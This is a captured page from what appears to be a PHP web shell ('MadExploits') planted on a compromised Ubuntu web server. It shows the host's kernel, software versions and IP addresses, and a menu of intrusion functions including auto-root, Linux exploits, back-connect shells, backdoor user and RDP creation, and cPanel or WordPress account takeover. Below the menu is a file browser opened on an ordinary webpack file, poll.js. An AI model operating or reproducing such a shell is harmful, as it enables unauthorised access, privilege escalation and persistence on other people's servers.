Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
node_modules /
webpack /
hot /
[ HOME SHELL ]
Name
Size
Permission
Action
dev-server.js
1.61
KB
-rw-r--r--
emitter.js
75
B
-rw-r--r--
log-apply-result.js
1.27
KB
-rw-r--r--
log.js
1.11
KB
-rw-r--r--
only-dev-server.js
2.55
KB
-rw-r--r--
poll.js
1.15
KB
-rw-r--r--
signal.js
1.63
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : poll.js
/* MIT License http://www.opensource.org/licenses/mit-license.php Author Tobias Koppers @sokra */ /*globals __resourceQuery */ if (module.hot) { var hotPollInterval = +__resourceQuery.substr(1) || 10 * 60 * 1000; var log = require("./log"); var checkForUpdate = function checkForUpdate(fromUpdate) { if (module.hot.status() === "idle") { module.hot .check(true) .then(function(updatedModules) { if (!updatedModules) { if (fromUpdate) log("info", "[HMR] Update applied."); return; } require("./log-apply-result")(updatedModules, updatedModules); checkForUpdate(true); }) .catch(function(err) { var status = module.hot.status(); if (["abort", "fail"].indexOf(status) >= 0) { log("warning", "[HMR] Cannot apply update."); log("warning", "[HMR] " + (err.stack || err.message)); log("warning", "[HMR] You need to restart the application!"); } else { log( "warning", "[HMR] Update failed: " + (err.stack || err.message) ); } }); } }; setInterval(checkForUpdate, hotPollInterval); } else { throw new Error("[HMR] Hot Module Replacement is disabled."); }
Close